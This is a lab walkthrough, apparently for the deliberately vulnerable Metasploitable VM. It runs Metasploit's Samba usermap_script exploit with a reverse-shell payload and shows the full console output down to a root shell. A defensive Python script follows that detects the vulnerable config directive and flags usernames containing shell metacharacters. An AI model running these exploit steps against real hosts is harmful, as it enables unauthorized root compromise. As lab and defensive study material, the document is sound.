# Metasploitable (samba)

## Introduction

Samba: Remote Command Injection Vulnerability

## Execution
```text
# msfconsole
msf > nmap -sV -O -p 100-500 192.168.1.50
[*] exec: nmap -sV -O -p 100-500 192.168.1.50

Not shown: 399 closed ports
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.28
Network Distance: 1 hop

msf > search samba
msf > use multi/samba/usermap_script
msf exploit(usermap_script) > set rhost 192.168.1.50
msf exploit(usermap_script) > set rport 445
msf exploit(usermap_script) > set payload cmd/unix/reverse
msf exploit(usermap_script) > set lhost 192.168.1.100
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo fXQUYEFiaAED6rM4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "fXQUYEFiaAED6rM4\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.100:4444 -> 192.168.1.50:58167)
uname -a
Linux metasploitable 2.6.24-16-server i686 GNU/Linux
whoami
root
```
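As an added defender-side example (not part of the original post or of Metasploit), the following Python script parses an smb.conf-style file for the `username map script` directive that the usermap_script module abuses, and flags client-supplied usernames that carry shell metacharacters, which is the condition that makes that directive dangerous on an unpatched Samba 3.x. The configuration fragment, the script path and the usernames are constructed samples.

```python
import re

# Constructed smb.conf fragment for illustration; the script path is a placeholder,
# not Metasploitable's real configuration.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = %h server
   ; the directive abused by the usermap_script module
   username map script = /etc/samba/scripts/mapusers.sh
   security = user

[printers]
   path = /var/spool/samba
"""

# Shell metacharacters that never belong in a legitimate account name.
SHELL_META = re.compile(r"[`$;|&<>(){}]")

def parse_smb_conf(text):
    """Parse an smb.conf-style ini file into {section: {key: value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":      # blank or comment line
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            # Samba ignores case and internal whitespace in parameter names.
            sections[current][" ".join(key.lower().split())] = value.strip()
    return sections

def find_username_map_script(conf):
    """Return (section, script) pairs where 'username map script' is configured."""
    return [(name, params["username map script"])
            for name, params in conf.items() if "username map script" in params]

def suspicious_usernames(usernames):
    """Flag SMB session-setup usernames carrying shell metacharacters."""
    return [u for u in usernames if SHELL_META.search(u)]

if __name__ == "__main__":
    for section, script in find_username_map_script(parse_smb_conf(SAMPLE_SMB_CONF)):
        print(f"[{section}] username map script = {script}  <- remove, or patch Samba")
```

Run it against a real smb.conf and against usernames pulled from Samba or IDS logs; a hit on the directive means the host depends entirely on the Samba patch level for safety.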
